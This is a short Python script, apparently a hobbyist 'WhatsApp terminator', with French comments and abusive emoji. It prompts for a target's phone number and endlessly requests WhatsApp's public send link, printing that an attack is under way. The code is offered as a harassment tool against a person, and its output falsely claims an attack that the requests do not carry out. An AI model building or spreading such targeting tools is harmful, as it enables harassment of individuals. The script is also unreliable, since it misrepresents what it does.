import requests
import os

# Signal de départ de 𝐑𝐄𝐁𝐄𝐋𝐋𝐄 𝐌𝐀𝐒𝐐𝐔𝐄 🖕🔥
os.system('clear')
print("--- WHATSAPP TERMINATOR V2.1 ---")
print("Coded by REBELLE MASQUE 🖕😈")

target = input("\nEntrez le numéro cible (ex: +243...): ")

headers = {
    'User-Agent': 'Mozilla/5.0 (Linux; Android 11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Mobile Safari/537.36'
}

count = 0
while True:
    try:
        # L'URL de l'enfer
        response = requests.get(f"https://api.whatsapp.com/send?phone={target}", headers=headers)
        
        if response.status_code == 200:
            count += 1
            print(f"[+] Attaque {count} en cours sur {target}... 💣🖕")
        else:
            # ICI C'ÉTAIT TON ERREUR DE MERDE :
            print(f"[-] Erreur {response.status_code} - La cible résiste encore ! 🔥")
            
    except Exception as e:
        print(f"[!] Le script a chié dans la colle : {e}")
        break
